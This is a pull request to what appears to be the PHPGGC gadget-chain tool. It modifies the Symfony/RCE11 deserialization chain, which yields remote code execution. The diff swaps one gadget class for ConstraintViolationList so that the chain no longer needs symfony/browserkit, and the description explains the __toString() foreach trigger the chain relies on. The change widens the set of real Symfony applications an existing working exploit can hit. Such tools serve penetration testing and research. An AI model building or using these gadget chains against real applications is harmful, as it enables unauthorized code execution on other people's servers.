### PR TITLE
Minor improvement to Symfony/RCE11 Chain

### DIFF
--- a/gadgetchains/Symfony/RCE/11/chain.php
+++ b/gadgetchains/Symfony/RCE/11/chain.php
@@ -15,7 +15,7 @@ class RCE11 extends \PHPGGC\GadgetChain\RCE\FunctionCall
             $parameters["parameter"]
         ]);
         $b = new \Symfony\Component\Finder\Iterator\SortableIterator($a, "call_user_func");
-        $c = new \Symfony\Component\BrowserKit\Response($b);
+        $c = new \Symfony\Component\Validator\ConstraintViolationList($b);
         $d = new \Symfony\Component\Security\Core\Authentication\Token\AnonymousToken($c);
         return $d;
     }


### PR DESCRIPTION
Hi,

This PR improves the Symfony/RCE11 gadget chain by removing the redundant dependency on `symfony/browserkit`.

In the original gadget chain, `\Symfony\Component\BrowserKit\Response` was used to trigger a `foreach()` loop in `__toString()`. 

However, I realised that some Symfony-based applications do not actually have `symfony/browserkit` installed. After taking a quick look at the Symfony/RCE11 gadget chain, it would appear that the `\Symfony\Component\Validator\ConstraintViolationList` class has the following [`__toString()` implementation](https://github.com/symfony/symfony/blob/v6.3.1/src/Symfony/Component/Validator/ConstraintViolationList.php#L50-L59):
~~~php
    public function __toString()
    {
        $string = '';

        foreach ($this->violations as $violation) { // triggers getIterator()
            $string .= $violation."\n";
        }

        return $string;
    }
~~~

This makes `\Symfony\Component\Validator\ConstraintViolationList` a suitable candidate gadget, rendering the usage of the `\Symfony\Component\BrowserKit\Response` redundant.

Unsurprisingly, this minor improvement does not affect the range of versions the gadget chain will work on when tested with `test-gc-compatibility.py` since `\Symfony\Component\Validator\ConstraintViolationList` was already used as part of the original gadget chain.

Great work on discovering the universal gadget chain by the way!
Cheers!